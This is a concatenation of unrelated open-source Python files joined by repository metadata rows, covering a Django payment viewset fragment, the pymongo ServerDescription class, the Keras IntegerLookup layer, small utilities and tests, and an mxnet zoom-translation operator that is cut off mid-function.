# 'billing_address_2',
# 'billing_city',
# 'billing_city_area',
# 'billing_company_name',
# 'billing_country_area',
# 'billing_country_code',
# 'billing_email',
# 'billing_first_name',
# 'billing_last_name',
# 'billing_postal_code',
# 'captured_amount',
# 'cc_brand',
# 'cc_exp_month',
# 'cc_exp_year',
# 'cc_first_digits',
# 'cc_last_digits',
# 'charge_status',
# 'checkout', # [checkout.Checkout]
# 'created',
# 'currency',
# 'customer_ip_address',
# 'extra_data',
# 'gateway',
# 'id',
# 'is_active',
# 'modified',
# 'order', # [order.Order]
# 'token',
# 'total',
# Reverse Fields
# 'transactions',
]
search_fields = [
# Fields
# 'billing_address_1',
# 'billing_address_2',
# 'billing_city',
# 'billing_city_area',
# 'billing_company_name',
# 'billing_country_area',
# 'billing_country_code',
# 'billing_email',
# 'billing_first_name',
# 'billing_last_name',
# 'billing_postal_code',
# 'captured_amount',
# 'cc_brand',
# 'cc_exp_month',
# 'cc_exp_year',
# 'cc_first_digits',
# 'cc_last_digits',
# 'charge_status',
# 'checkout',
# 'created',
# 'currency',
# 'customer_ip_address',
# 'extra_data',
# 'gateway',
# 'id',
# 'is_active',
# 'modified',
# 'order',
# 'token',
# 'total',
# Reverse Fields
# 'transactions',
]
ordering_fields = [
# Fields
# 'billing_address_1',
# 'billing_address_2',
# 'billing_city',
# 'billing_city_area',
# 'billing_company_name',
# 'billing_country_area',
# 'billing_country_code',
# 'billing_email',
# 'billing_first_name',
# 'billing_last_name',
# 'billing_postal_code',
# 'captured_amount',
# 'cc_brand',
# 'cc_exp_month',
# 'cc_exp_year',
# 'cc_first_digits',
# 'cc_last_digits',
# 'charge_status',
# 'checkout',
# 'created',
# 'currency',
# 'customer_ip_address',
# 'extra_data',
# 'gateway',
# 'id',
# 'is_active',
# 'modified',
# 'order',
# 'token',
# 'total',
# Reverse Fields
# 'transactions',
]
# '__all__'
# def get_object(self):
# return super().get_object()
# def create(self, request, *args, **kwargs):
# return super().create(request, *args, **kwargs)
# def retrieve(self, request, *args, **kwargs):
# return super().retrieve(request, *args, **kwargs)
# def update(self, request, *args, **kwargs):
# return super().update(request, *args, **kwargs)
# def destroy(self, request, *args, **kwargs):
# return super().destroy(request, *args, **kwargs)
# def list(self, request, *args, **kwargs):
# return super().list(request, *args, **kwargs)
| 25.846154 | 75 | 0.550366 |
9eb2c2d673f7caef76940c1376a9b8228c405177 | 421 | py | Python | core.py | WiGeeky/TelegramExportAnalyzer | 8d5f39271ef1b74fba32ae999763738426096a83 | [
"MIT"
] | 1 | 2021-02-21T16:02:51.000Z | 2021-02-21T16:02:51.000Z | core.py | WiGeeky/TelegramExportAnalyzer | 8d5f39271ef1b74fba32ae999763738426096a83 | [
"MIT"
] | null | null | null | core.py | WiGeeky/TelegramExportAnalyzer | 8d5f39271ef1b74fba32ae999763738426096a83 | [
"MIT"
] | null | null | null | import logging
import os
import json
logging.basicConfig(filename='output.log', level=logging.CRITICAL)
class Analyzer:
def __init__(self, file_path=None,):
self.file_path = file_path
def __enter__(self):
self.file = open(self.file_path, 'r')
self.obj = json.load(self.file)
return self.obj
def __exit__(self, type, value, traceback):
self.file.close()
| 22.157895 | 66 | 0.648456 |
ffd79b5007b4878bb49c70e29a48667d7a8ae03c | 1,110 | py | Python | fsleyes/tests/test_performance.py | pauldmccarthy/fsleyes | 453a6b91ec7763c39195814d635257e3766acf83 | [
"Apache-2.0"
] | 12 | 2018-05-05T01:36:25.000Z | 2021-09-23T20:44:08.000Z | fsleyes/tests/test_performance.py | pauldmccarthy/fsleyes | 453a6b91ec7763c39195814d635257e3766acf83 | [
"Apache-2.0"
] | 97 | 2018-05-05T02:17:23.000Z | 2022-03-29T14:58:42.000Z | fsleyes/tests/test_performance.py | pauldmccarthy/fsleyes | 453a6b91ec7763c39195814d635257e3766acf83 | [
"Apache-2.0"
] | 6 | 2017-12-09T09:02:00.000Z | 2021-03-05T18:55:13.000Z | #!/usr/bin/env python
#
# test_performance.py -
#
# Author: Paul McCarthy <pauldmccarthy@gmail.com>
#
from fsleyes.tests import run_cli_tests, discretise
cli_tests = """
3d.nii.gz
3d.nii.gz -ot mask -t 4000 10000
3d.nii.gz -ot mip
{{discretise('3d.nii.gz', 500)}} -ot label
dti
dti/dti_V1 -ot rgbvector
dti/dti_V1 -ot linevector
sh -ot sh
mesh_l_thal.vtk -mc 1 0 0
"""
extras = {'discretise' : discretise}
def add_prefix(prefix):
tests = list(cli_tests.strip().split('\n'))
tests = [prefix + t for t in tests]
return '\n'.join(tests)
def test_performance_p1_ortho():
tests = add_prefix('-p 1 -s ortho ')
run_cli_tests('test_performance', tests, extras=extras)
def test_performance_p2_ortho():
tests = add_prefix('-p 2 -s ortho ')
run_cli_tests('test_performance', tests, extras=extras)
def test_performance_p1_lightbox():
tests = add_prefix('-p 1 -s lightbox ')
run_cli_tests('test_performance', tests, extras=extras)
def test_performance_p2_lightbox():
tests = add_prefix('-p 2 -s lightbox ')
run_cli_tests('test_performance', tests, extras=extras)
| 21.346154 | 59 | 0.7 |
d2efa23258cc94e74e6d818c4e6dcd48ea707f52 | 36 | py | Python | core/entitiy/__init__.py | ryanolee/pager-duty-sync | 1fd88634e461b5db647d856bc6b59f990944685e | [
"MIT"
] | null | null | null | core/entitiy/__init__.py | ryanolee/pager-duty-sync | 1fd88634e461b5db647d856bc6b59f990944685e | [
"MIT"
] | 2 | 2020-09-27T18:19:17.000Z | 2021-06-29T09:21:04.000Z | core/entitiy/__init__.py | ryanolee/pager-duty-sync | 1fd88634e461b5db647d856bc6b59f990944685e | [
"MIT"
] | null | null | null | from .OnCallShift import OnCallShift | 36 | 36 | 0.888889 |
63c7cb6b5b7747ee15793bf87865f2ab501fcc84 | 226 | py | Python | administration/models.py | AhteshamSid/College_school_management_system | a8504708ea2f347d18d4ac59198f29d05c0374d2 | [
"MIT"
] | null | null | null | administration/models.py | AhteshamSid/College_school_management_system | a8504708ea2f347d18d4ac59198f29d05c0374d2 | [
"MIT"
] | null | null | null | administration/models.py | AhteshamSid/College_school_management_system | a8504708ea2f347d18d4ac59198f29d05c0374d2 | [
"MIT"
] | null | null | null | from django.db import models
class Designation(models.Model):
name = models.CharField(max_length=100, unique=True)
date = models.DateField(auto_now_add=True)
def __str__(self):
return self.name
| 22.6 | 57 | 0.690265 |
ee261ac96cb09741c624efdf517c4aa0b7f43e5d | 1,193 | py | Python | p784m/letter_case_permutation.py | l33tdaima/l33tdaima | 0a7a9573dc6b79e22dcb54357493ebaaf5e0aa90 | [
"MIT"
] | 1 | 2020-02-20T12:04:46.000Z | 2020-02-20T12:04:46.000Z | p784m/letter_case_permutation.py | l33tdaima/l33tdaima | 0a7a9573dc6b79e22dcb54357493ebaaf5e0aa90 | [
"MIT"
] | null | null | null | p784m/letter_case_permutation.py | l33tdaima/l33tdaima | 0a7a9573dc6b79e22dcb54357493ebaaf5e0aa90 | [
"MIT"
] | null | null | null | from typing import List
class Solution:
def letterCasePermutationV1(self, S: str) -> List[str]:
ans = []
def backtrack(path: str, i: int) -> None:
nonlocal S
while i < len(S) and S[i].isdigit():
path += S[i]
i += 1
if i == len(S):
ans.append(path)
return
backtrack(path + S[i].lower(), i + 1)
backtrack(path + S[i].upper(), i + 1)
backtrack("", 0)
return ans
def letterCasePermutationV2(self, S: str) -> List[str]:
ans = [""]
for ch in S:
if ch.isalpha():
ans = [prefix + c for prefix in ans for c in [ch.lower(), ch.upper()]]
else:
ans = [prefix + ch for prefix in ans]
return ans
# TESTS
for S, expected in [
("a1b2", ["a1b2", "a1B2", "A1b2", "A1B2"]),
("3z4", ["3z4", "3Z4"]),
("12345", ["12345"]),
("0", ["0"]),
]:
sol = Solution()
actual = sol.letterCasePermutationV1(S)
print("Letter case permutation of", S, "->", actual)
assert actual == expected
assert expected == sol.letterCasePermutationV2(S)
| 26.511111 | 86 | 0.483655 |
04e9dbfe77b46dddd534616fd70880e301656bc3 | 6,335 | py | Python | stackoverflow/venv/lib/python3.6/site-packages/pymongo/server_description.py | zhi-xianwei/learn_python3_spider | a3301f8112e4ded25c3578162db8c6a263a0693b | [
"MIT"
] | 9,953 | 2019-04-03T23:41:04.000Z | 2022-03-31T11:54:44.000Z | stackoverflow/venv/lib/python3.6/site-packages/pymongo/server_description.py | W4LKURE/learn_python3_spider | 98dd354a41598b31302641f9a0ea49d1ecfa0fb1 | [
"MIT"
] | 44 | 2019-05-27T10:59:29.000Z | 2022-03-31T14:14:29.000Z | stackoverflow/venv/lib/python3.6/site-packages/pymongo/server_description.py | W4LKURE/learn_python3_spider | 98dd354a41598b31302641f9a0ea49d1ecfa0fb1 | [
"MIT"
] | 2,803 | 2019-04-06T13:15:33.000Z | 2022-03-31T07:42:01.000Z | # Copyright 2014-present MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Represent one server the driver is connected to."""
from bson import EPOCH_NAIVE
from pymongo.server_type import SERVER_TYPE
from pymongo.ismaster import IsMaster
from pymongo.monotonic import time as _time
class ServerDescription(object):
"""Immutable representation of one server.
:Parameters:
- `address`: A (host, port) pair
- `ismaster`: Optional IsMaster instance
- `round_trip_time`: Optional float
- `error`: Optional, the last error attempting to connect to the server
"""
__slots__ = (
'_address', '_server_type', '_all_hosts', '_tags', '_replica_set_name',
'_primary', '_max_bson_size', '_max_message_size',
'_max_write_batch_size', '_min_wire_version', '_max_wire_version',
'_round_trip_time', '_me', '_is_writable', '_is_readable',
'_ls_timeout_minutes', '_error', '_set_version', '_election_id',
'_cluster_time', '_last_write_date', '_last_update_time')
def __init__(
self,
address,
ismaster=None,
round_trip_time=None,
error=None):
self._address = address
if not ismaster:
ismaster = IsMaster({})
self._server_type = ismaster.server_type
self._all_hosts = ismaster.all_hosts
self._tags = ismaster.tags
self._replica_set_name = ismaster.replica_set_name
self._primary = ismaster.primary
self._max_bson_size = ismaster.max_bson_size
self._max_message_size = ismaster.max_message_size
self._max_write_batch_size = ismaster.max_write_batch_size
self._min_wire_version = ismaster.min_wire_version
self._max_wire_version = ismaster.max_wire_version
self._set_version = ismaster.set_version
self._election_id = ismaster.election_id
self._cluster_time = ismaster.cluster_time
self._is_writable = ismaster.is_writable
self._is_readable = ismaster.is_readable
self._ls_timeout_minutes = ismaster.logical_session_timeout_minutes
self._round_trip_time = round_trip_time
self._me = ismaster.me
self._last_update_time = _time()
self._error = error
if ismaster.last_write_date:
# Convert from datetime to seconds.
delta = ismaster.last_write_date - EPOCH_NAIVE
self._last_write_date = delta.total_seconds()
else:
self._last_write_date = None
@property
def address(self):
"""The address (host, port) of this server."""
return self._address
@property
def server_type(self):
"""The type of this server."""
return self._server_type
@property
def server_type_name(self):
"""The server type as a human readable string.
.. versionadded:: 3.4
"""
return SERVER_TYPE._fields[self._server_type]
@property
def all_hosts(self):
"""List of hosts, passives, and arbiters known to this server."""
return self._all_hosts
@property
def tags(self):
return self._tags
@property
def replica_set_name(self):
"""Replica set name or None."""
return self._replica_set_name
@property
def primary(self):
"""This server's opinion about who the primary is, or None."""
return self._primary
@property
def max_bson_size(self):
return self._max_bson_size
@property
def max_message_size(self):
return self._max_message_size
@property
def max_write_batch_size(self):
return self._max_write_batch_size
@property
def min_wire_version(self):
return self._min_wire_version
@property
def max_wire_version(self):
return self._max_wire_version
@property
def set_version(self):
return self._set_version
@property
def election_id(self):
return self._election_id
@property
def cluster_time(self):
return self._cluster_time
@property
def election_tuple(self):
return self._set_version, self._election_id
@property
def me(self):
return self._me
@property
def logical_session_timeout_minutes(self):
return self._ls_timeout_minutes
@property
def last_write_date(self):
return self._last_write_date
@property
def last_update_time(self):
return self._last_update_time
@property
def round_trip_time(self):
"""The current average latency or None."""
# This override is for unittesting only!
if self._address in self._host_to_round_trip_time:
return self._host_to_round_trip_time[self._address]
return self._round_trip_time
@property
def error(self):
"""The last error attempting to connect to the server, or None."""
return self._error
@property
def is_writable(self):
return self._is_writable
@property
def is_readable(self):
return self._is_readable
@property
def mongos(self):
return self._server_type == SERVER_TYPE.Mongos
@property
def is_server_type_known(self):
return self.server_type != SERVER_TYPE.Unknown
@property
def retryable_writes_supported(self):
"""Checks if this server supports retryable writes."""
return (
self._ls_timeout_minutes is not None and
self._server_type in (SERVER_TYPE.Mongos, SERVER_TYPE.RSPrimary))
@property
def retryable_reads_supported(self):
"""Checks if this server supports retryable writes."""
return self._max_wire_version >= 6
# For unittesting only. Use under no circumstances!
_host_to_round_trip_time = {}
| 29.882075 | 79 | 0.67056 |
5ef75cbc2d294b7b19070c5cdd9d213f823af358 | 1,749 | py | Python | go/apps/subscription/tests/test_definition.py | lynnUg/vumi-go | 852f906c46d5d26940bd6699f11488b73bbc3742 | [
"BSD-3-Clause"
] | null | null | null | go/apps/subscription/tests/test_definition.py | lynnUg/vumi-go | 852f906c46d5d26940bd6699f11488b73bbc3742 | [
"BSD-3-Clause"
] | null | null | null | go/apps/subscription/tests/test_definition.py | lynnUg/vumi-go | 852f906c46d5d26940bd6699f11488b73bbc3742 | [
"BSD-3-Clause"
] | null | null | null | from go.apps.subscription.definition import ConversationDefinition
from go.apps.subscription.metrics import SubscribedMetric, UnsubscribedMetric
from go.base.tests.helpers import GoDjangoTestCase
from go.vumitools.metrics import MessagesReceivedMetric, MessagesSentMetric
from go.vumitools.tests.helpers import VumiApiHelper
class TestSubscriptionConversationDefinition(GoDjangoTestCase):
def setUp(self):
self.vumi_helper = self.add_helper(VumiApiHelper(is_sync=True))
self.user_helper = self.vumi_helper.get_or_create_user()
wrapped_conv = self.user_helper.create_conversation(
u'subscription', config={
'handlers': [
{'campaign_name': 'campaign-1'},
{'campaign_name': 'campaign-2'}]
})
self.conv = wrapped_conv.c
self.conv_def = ConversationDefinition(self.conv)
def test_metrics_retrieval(self):
[m1, m2, m3, m4, m5, m6] = self.conv_def.get_metrics()
self.assertEqual(m1.metric.name, 'messages_sent')
self.assertTrue(isinstance(m1, MessagesSentMetric))
self.assertEqual(m2.metric.name, 'messages_received')
self.assertTrue(isinstance(m2, MessagesReceivedMetric))
self.assertEqual(m3.metric.name, 'campaign-1.subscribed')
self.assertTrue(isinstance(m3, SubscribedMetric))
self.assertEqual(m4.metric.name, 'campaign-2.subscribed')
self.assertTrue(isinstance(m4, SubscribedMetric))
self.assertEqual(m5.metric.name, 'campaign-1.unsubscribed')
self.assertTrue(isinstance(m5, UnsubscribedMetric))
self.assertEqual(m6.metric.name, 'campaign-2.unsubscribed')
self.assertTrue(isinstance(m6, UnsubscribedMetric))
| 41.642857 | 77 | 0.708405 |
40bf92cbd9543db273c6cb1cc19647144ec476f9 | 14,852 | py | Python | tensorflow/python/keras/layers/preprocessing/integer_lookup.py | jonnymiyagi/tensorflow | b347508e0decd7ac3ec8ae8c9ab53f7a117a6124 | [
"Apache-2.0"
] | 1 | 2021-03-16T00:50:36.000Z | 2021-03-16T00:50:36.000Z | tensorflow/python/keras/layers/preprocessing/integer_lookup.py | yuxunzhi/tensorflow | bb562131d4bce6bf69188a52e570ef9376726fe4 | [
"Apache-2.0"
] | null | null | null | tensorflow/python/keras/layers/preprocessing/integer_lookup.py | yuxunzhi/tensorflow | bb562131d4bce6bf69188a52e570ef9376726fe4 | [
"Apache-2.0"
] | null | null | null | # Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Keras string lookup preprocessing layer."""
# pylint: disable=g-classes-have-attributes
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.framework import dtypes
from tensorflow.python.keras.engine import base_preprocessing_layer
from tensorflow.python.keras.layers.preprocessing import index_lookup
from tensorflow.python.keras.layers.preprocessing import table_utils
from tensorflow.python.util.tf_export import keras_export
@keras_export("keras.layers.experimental.preprocessing.IntegerLookup", v1=[])
class IntegerLookup(index_lookup.IndexLookup):
"""Maps integers from a vocabulary to integer indices.
This layer translates a set of arbitrary integers into an integer output via a
table-based vocabulary lookup.
The vocabulary for the layer can be supplied on construction or learned via
`adapt()`. During `adapt()`, the layer will analyze a data set, determine the
frequency of individual integer values, and create a vocabulary from them. If
the vocabulary is capped in size, the most frequent values will be used to
create the vocabulary and all others will be treated as out-of-vocabulary
(OOV).
There are two possible output modes for the layer.
When `output_mode` is "int", input values are converted to their index in the
vocabulary (an integer).
When `output_mode` is "binary", "count", or "tf-idf", input strings
are encoded into an array where each dimension corresponds to an element in
the vocabulary.
The vocabulary can optionally contain a mask value as well as an OOV value
(which can optionally occupy multiple indices in the vocabulary, as set
by `num_oov_indices`).
The position of these values in the vocabulary is fixed. When `output_mode` is
"int", the vocabulary will begin with the mask value at index 0, followed by
OOV indices, followed by the rest of the vocabulary. When `output_mode` is
"binary", "count", or "tf-idf" the vocabulary will begin with OOV indices and
instances of the mask value will be dropped.
Args:
max_values: The maximum size of the vocabulary for this layer. If None,
there is no cap on the size of the vocabulary. Note that this size
includes the OOV and mask values. Default to None.
num_oov_indices: The number of out-of-vocabulary values to use. If this
value is more than 1, OOV inputs are modulated to determine their OOV
value. If this value is 0, OOV inputs will map to -1 when `output_mode` is
"int" and are dropped otherwise. Defaults to 1.
mask_value: A value that represents masked inputs. When `output_mode` is
"int", the value is included in vocabulary and mapped to index 0. In other
output modes, the value will not appear in the vocabulary and instances
of the mask value in the input will be dropped. If set to None, no mask
term will be added. Defaults to 0.
oov_value: Only used when `invert` is True. The value to return for OOV
indices. Defaults to -1.
vocabulary: An optional list of values, or a path to a text file containing
a vocabulary to load into this layer. The file should contain one value
per line. If the list or file contains the same value multiple times, an
error will be thrown.
invert: Only valid when `output_mode` is "int". If True, this layer will map
indices to vocabulary items instead of mapping vocabulary items to
indices. Default to False.
output_mode: Specification for the output of the layer. Defaults to "int".
Values can be "int", "binary", "count", or "tf-idf" configuring the layer
as follows:
"int": Return the raw integer indices of the input values.
"binary": Outputs a single int array per sample, of either vocab_size or
max_values size, containing 1s in all elements where the value mapped
to that index exists at least once in the sample.
"count": Like "binary", but the int array contains a count of the number
of times the value at that index appeared in the sample.
"tf-idf": As "binary", but the TF-IDF algorithm is applied to find the
value in each value slot.
pad_to_max_values: Only applicable when `output_mode` is "binary", "count",
or "tf-idf". If True, the output will have its feature axis padded to
`max_values` even if the number of unique values in the vocabulary is less
than max_values, resulting in a tensor of shape [batch_size, max_values]
regardless of vocabulary size. Defaults to False.
sparse: Boolean. Only applicable when `output_mode` is "binary", "count",
or "tf-idf". If True, returns a `SparseTensor` instead of a dense
`Tensor`. Defaults to False.
Examples:
**Creating a lookup layer with a known vocabulary**
This example creates a lookup layer with a pre-existing vocabulary.
>>> vocab = [12, 36, 1138, 42]
>>> data = tf.constant([[12, 1138, 42], [42, 1000, 36]]) # Note OOV values
>>> layer = IntegerLookup(vocabulary=vocab)
>>> layer(data)
<tf.Tensor: shape=(2, 3), dtype=int64, numpy=
array([[2, 4, 5],
[5, 1, 3]])>
**Creating a lookup layer with an adapted vocabulary**
This example creates a lookup layer and generates the vocabulary by analyzing
the dataset.
>>> data = tf.constant([[12, 1138, 42], [42, 1000, 36]])
>>> layer = IntegerLookup()
>>> layer.adapt(data)
>>> layer.get_vocabulary()
[0, -1, 42, 1138, 1000, 36, 12]
Note how the mask value 0 and the OOV value -1 have been added to the
vocabulary. The remaining values are sorted by frequency (1138, which has
2 occurrences, is first) then by inverse sort order.
>>> data = tf.constant([[12, 1138, 42], [42, 1000, 36]])
>>> layer = IntegerLookup()
>>> layer.adapt(data)
>>> layer(data)
<tf.Tensor: shape=(2, 3), dtype=int64, numpy=
array([[6, 3, 2],
[2, 4, 5]])>
**Lookups with multiple OOV indices**
This example demonstrates how to use a lookup layer with multiple OOV indices.
When a layer is created with more than one OOV index, any OOV values are
hashed into the number of OOV buckets, distributing OOV values in a
deterministic fashion across the set.
>>> vocab = [12, 36, 1138, 42]
>>> data = tf.constant([[12, 1138, 42], [37, 1000, 36]])
>>> layer = IntegerLookup(vocabulary=vocab, num_oov_indices=2)
>>> layer(data)
<tf.Tensor: shape=(2, 3), dtype=int64, numpy=
array([[3, 5, 6],
[2, 1, 4]])>
Note that the output for OOV value 37 is 2, while the output for OOV value
1000 is 1. The in-vocab terms have their output index increased by 1 from
earlier examples (12 maps to 3, etc) in order to make space for the extra OOV
value.
**Multi-hot output**
Configure the layer with `output_mode='binary'`. Note that the first
`num_oov_indices` dimensions in the binary encoding represent OOV values
>>> vocab = [12, 36, 1138, 42]
>>> data = tf.constant([[12, 1138, 42, 42], [42, 7, 36, 7]]) # Note OOV values
>>> layer = IntegerLookup(vocabulary=vocab, output_mode='binary')
>>> layer(data)
<tf.Tensor: shape=(2, 5), dtype=float32, numpy=
array([[0., 1., 0., 1., 1.],
[1., 0., 1., 0., 1.]], dtype=float32)>
**Value count output**
Configure the layer with `output_mode='count'`. As with binary output, the
first `num_oov_indices` dimensions in the output represent OOV values.
>>> vocab = [12, 36, 1138, 42]
>>> data = tf.constant([[12, 1138, 42, 42], [42, 7, 36, 7]]) # Note OOV values
>>> layer = IntegerLookup(vocabulary=vocab, output_mode='count')
>>> layer(data)
<tf.Tensor: shape=(2, 5), dtype=float32, numpy=
array([[0., 1., 0., 1., 2.],
[2., 0., 1., 0., 1.]], dtype=float32)>
**TF-IDF output**
Configure the layer with `output_mode='tf-idf'`. As with binary output, the
first `num_oov_indices` dimensions in the output represent OOV values.
Each value bin will output `value_count * idf_weight`, where the idf weights
are the inverse document frequency weights per value. These should be provided
along with the vocabulary. Note that the `idf_weight` for OOV values will
default to the average of all idf weights passed in.
>>> vocab = [12, 36, 1138, 42]
>>> idf_weights = [0.25, 0.75, 0.6, 0.4]
>>> data = tf.constant([[12, 1138, 42, 42], [42, 7, 36, 7]]) # Note OOV values
>>> layer = IntegerLookup(output_mode='tf-idf')
>>> layer.set_vocabulary(vocab, idf_weights=idf_weights)
>>> layer(data)
<tf.Tensor: shape=(2, 5), dtype=float32, numpy=
array([[0. , 0.25, 0. , 0.6 , 0.8 ],
[1.0 , 0. , 0.75, 0. , 0.4 ]], dtype=float32)>
To specify the idf weights for oov values, you will need to pass the entire
vocabularly including the leading oov value.
>>> vocab = [-1, 12, 36, 1138, 42]
>>> idf_weights = [0.9, 0.25, 0.75, 0.6, 0.4]
>>> data = tf.constant([[12, 1138, 42, 42], [42, 7, 36, 7]]) # Note OOV values
>>> layer = IntegerLookup(output_mode='tf-idf')
>>> layer.set_vocabulary(vocab, idf_weights=idf_weights)
>>> layer(data)
<tf.Tensor: shape=(2, 5), dtype=float32, numpy=
array([[0. , 0.25, 0. , 0.6 , 0.8 ],
[1.8 , 0. , 0.75, 0. , 0.4 ]], dtype=float32)>
When adapting the layer in tf-idf mode, each input sample will be considered a
document, and idf weight per value will be calculated as
`log(1 + num_documents / (1 + value_document_count))`.
**Inverse lookup**
This example demonstrates how to map indices to values using this layer. (You
can also use adapt() with inverse=True, but for simplicity we'll pass the
vocab in this example.)
>>> vocab = [12, 36, 1138, 42]
>>> data = tf.constant([[2, 4, 5], [5, 1, 3]])
>>> layer = IntegerLookup(vocabulary=vocab, invert=True)
>>> layer(data)
<tf.Tensor: shape=(2, 3), dtype=int64, numpy=
array([[ 12, 1138, 42],
[ 42, -1, 36]])>
Note that the first two indices correspond to the mask and oov value by
default. This behavior can be disabled by setting `mask_value=None` and
`num_oov_indices=0`.
**Forward and inverse lookup pairs**
This example demonstrates how to use the vocabulary of a standard lookup
layer to create an inverse lookup layer.
>>> vocab = [12, 36, 1138, 42]
>>> data = tf.constant([[12, 1138, 42], [42, 1000, 36]])
>>> layer = IntegerLookup(vocabulary=vocab)
>>> i_layer = IntegerLookup(vocabulary=layer.get_vocabulary(), invert=True)
>>> int_data = layer(data)
>>> i_layer(int_data)
<tf.Tensor: shape=(2, 3), dtype=int64, numpy=
array([[ 12, 1138, 42],
[ 42, -1, 36]])>
In this example, the input value 1000 resulted in an output of -1, since
1000 was not in the vocabulary - it got represented as an OOV, and all OOV
values are returned as -1 in the inverse layer. Also, note that for the
inverse to work, you must have already set the forward layer vocabulary
either directly or via `fit()` before calling `get_vocabulary()`.
"""
def __init__(self,
max_values=None,
num_oov_indices=1,
mask_value=0,
oov_value=-1,
vocabulary=None,
invert=False,
output_mode=index_lookup.INT,
sparse=False,
pad_to_max_values=False,
**kwargs):
allowed_dtypes = [dtypes.int64]
if "dtype" in kwargs and kwargs["dtype"] not in allowed_dtypes:
raise ValueError("The value of the dtype argument for IntegerLookup may "
"only be one of %s." % (allowed_dtypes,))
if "dtype" not in kwargs:
kwargs["dtype"] = dtypes.int64
# If max_values is set, the value must be greater than 1 - otherwise we
# are creating a 0-element vocab, which doesn't make sense.
if max_values is not None and max_values <= 1:
raise ValueError("If set, max_values must be greater than 1. "
"You passed %s" % (max_values,))
if num_oov_indices < 0:
raise ValueError(
"num_oov_indices must be greater than or equal to 0. You passed %s" %
(num_oov_indices,))
if vocabulary is not None:
if isinstance(vocabulary, str):
vocabulary = table_utils.get_vocabulary_from_file(vocabulary)
vocabulary = [int(v) for v in vocabulary]
super(IntegerLookup, self).__init__(
max_tokens=max_values,
num_oov_indices=num_oov_indices,
mask_token=mask_value,
oov_token=oov_value,
vocabulary=vocabulary,
invert=invert,
output_mode=output_mode,
sparse=sparse,
pad_to_max_tokens=pad_to_max_values,
**kwargs)
base_preprocessing_layer.keras_kpl_gauge.get_cell("IntegerLookup").set(True)
def get_config(self):
base_config = super(IntegerLookup, self).get_config()
# Because the super config has a bunch of args we're also passing,
# we need to rename and remove them from the config dict.
base_config["max_values"] = base_config["max_tokens"]
del base_config["max_tokens"]
base_config["mask_value"] = base_config["mask_token"]
del base_config["mask_token"]
base_config["oov_value"] = base_config["oov_token"]
del base_config["oov_token"]
base_config["pad_to_max_values"] = base_config["pad_to_max_tokens"]
del base_config["pad_to_max_tokens"]
return base_config
def set_vocabulary(self, vocabulary, idf_weights=None):
if isinstance(vocabulary, str):
if self.output_mode == index_lookup.TFIDF:
raise RuntimeError(
"Setting vocabulary directly from a file is not "
"supported in TF-IDF mode, since this layer cannot "
"read files containing TF-IDF weight data. Please "
"read the file using Python and set the vocabulary "
"and weights by passing lists or arrays to the "
"set_vocabulary function's `vocabulary` and `idf_weights` "
"args.")
vocabulary = table_utils.get_vocabulary_from_file(vocabulary)
vocabulary = [int(v) for v in vocabulary]
super().set_vocabulary(vocabulary, idf_weights=idf_weights)
| 43.300292 | 80 | 0.676811 |
482e2286ff62f2a03ba24bce4757bf8d0de1c4a4 | 6,123 | py | Python | deepim/operator_py/zoom_trans.py | THU-DA-6D-Pose-Group/mx-DeepIM | f1c850e5f8f75f1051a89c40daff9185870020f5 | [
"Apache-2.0"
] | 229 | 2018-09-08T08:38:59.000Z | 2022-03-29T07:09:22.000Z | deepim/operator_py/zoom_trans.py | greatwallet/mx-DeepIM | 74b6df2e3f6be7d6fed23ba2f553dab5ae950700 | [
"Apache-2.0"
] | 59 | 2018-09-13T20:10:36.000Z | 2021-01-08T12:22:27.000Z | deepim/operator_py/zoom_trans.py | greatwallet/mx-DeepIM | 74b6df2e3f6be7d6fed23ba2f553dab5ae950700 | [
"Apache-2.0"
] | 59 | 2018-09-08T07:56:33.000Z | 2022-03-25T22:01:42.000Z | # --------------------------------------------------------
# Deep Iterative Matching Network
# Licensed under The Apache-2.0 License [see LICENSE for details]
# Written by Yi Li, Gu Wang
# --------------------------------------------------------
from __future__ import print_function, division
import sys
import os
cur_dir = os.path.abspath(os.path.dirname(__file__))
sys.path.insert(0, os.path.join(cur_dir, "../../external/mxnet/mxnet_v00_origin"))
import mxnet as mx
import numpy as np
class ZoomTransOperator(mx.operator.CustomOp):
def __init__(self, b_inv_zoom, b_zoom_grad):
super(ZoomTransOperator, self).__init__()
self.b_inv_zoom = b_inv_zoom
self.b_zoom_grad = b_zoom_grad
def forward(self, is_train, req, in_data, out_data, aux):
ctx = in_data[0].context
batch_size = in_data[0].shape[0]
zoom_factor_array = in_data[0].asnumpy()
trans_delta_array = in_data[1].asnumpy()
zoom_trans_delta_array = np.zeros(trans_delta_array.shape)
for batch_idx in range(batch_size):
wx = zoom_factor_array[batch_idx][0]
wy = zoom_factor_array[batch_idx][0]
assert wx == wy
delta_x, delta_y, delta_z = trans_delta_array[batch_idx]
if self.b_inv_zoom:
# zoom backward
zoom_delta_x = delta_x * wx
zoom_delta_y = delta_y * wy
else:
# zoom in
zoom_delta_x = delta_x / wx # wx = crop / origin
zoom_delta_y = delta_y / wy
zoom_delta_z = delta_z
zoom_trans_delta_array[batch_idx, 0] = zoom_delta_x
zoom_trans_delta_array[batch_idx, 1] = zoom_delta_y
zoom_trans_delta_array[batch_idx, 2] = zoom_delta_z
self.assign(out_data[0], req[0], mx.ndarray.array(zoom_trans_delta_array, ctx=ctx))
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
ctx = in_data[0].context
batch_size = in_data[0].shape[0]
zoom_factor_array = in_data[0].asnumpy()
zoom_trans_grad_array = out_grad[0].asnumpy()
trans_grad_array = np.zeros(zoom_trans_grad_array.shape)
for batch_idx in range(batch_size):
wx = zoom_factor_array[batch_idx][0]
wy = zoom_factor_array[batch_idx][0]
